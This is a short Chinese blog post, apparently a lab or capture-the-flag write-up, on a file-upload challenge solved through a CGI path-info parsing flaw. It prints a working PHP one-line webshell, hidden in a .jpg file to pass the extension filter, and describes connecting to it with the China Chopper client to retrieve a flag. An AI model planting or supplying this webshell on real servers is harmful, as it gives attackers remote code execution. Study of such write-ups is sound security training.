美文网首页
文件上传靶场—CGI解析漏洞

文件上传靶场—CGI解析漏洞

作者: N8_xEnn7nA1 | 来源:发表于2018-11-13 13:15 被阅读0次

    这道题利用的是CGI的一个解析漏洞:
    -> 当 x_pathinfo 开启时,会导致下面的问题:
    比如,访问 http://www.victim.com/evil.jpg/1.php 时,evil.jpg 会被当做php 脚本进行解析。

    查看源码:

    image.png

    发现只能上传 jpg 后缀的文件:

    于是将php一句话木马保存到 ladybird254.jpg 文件中,内容是:

    <?php eval($_POST[hero]);?>
    

    上传结果如下:

    image.png

    配合CGI解析漏洞,用菜刀进行连接:

    image.png

    进入保存上传文件的目录中找到flag文件:

    image.png

    相关文章

      网友评论

          本文标题:文件上传靶场—CGI解析漏洞

          本文链接:https://www.haomeiwen.com/subject/gcokfqtx.html